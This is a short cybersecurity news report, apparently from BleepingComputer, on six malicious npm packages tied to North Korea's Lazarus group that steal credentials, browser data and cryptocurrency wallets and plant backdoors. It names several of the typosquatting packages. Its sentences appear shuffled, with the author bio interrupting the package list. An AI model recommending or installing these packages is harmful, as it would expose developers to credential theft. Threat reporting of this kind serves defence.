The packages contain malicious code designed to steal sensitive information, such as cryptocurrency wallets and browser data that contains stored passwords, cookies, and browsing history. The packages, which have been downloaded 330 times, are designed to steal account credentials, deploy backdoors on compromised systems, and extract sensitive cryptocurrency information. Six malicious packages have been identified on npm (Node package manager) linked to the notorious North Korean hacking group Lazarus. The threat group is known for pushing malicious packages into software registries like npm, which is used by millions of JavaScript developers, and compromising systems passively. is-buffer-validator – Malicious package mimicking the popular is-buffer library to steal credentials. Bill Toulas Bill Toulas is a tech writer and infosec news reporter with over a decade of experience working on various online publications, covering open-source, Linux, malware, data breach incidents, and hacks. array-empty-validator – Fraudulent package designed to collect system and browser credentials. Software developers are advised to double-check the packages they use for their projects and constantly scrutinize code in open-source software to find suspicious signs like obfuscated code and calls to external servers. yoojae-validator – Fake validation library used to extract sensitive data from infected systems. "The code is designed to collect system environment details, including the hostname, operating system, and system directories," explains the Socket report. auth-validator – Mimics authentication validation tools to steal login credentials and API keys.
This Cyber News was published on www.bleepingcomputer.com. Publication date: Tue, 11 Mar 2025 20:45:20 +0000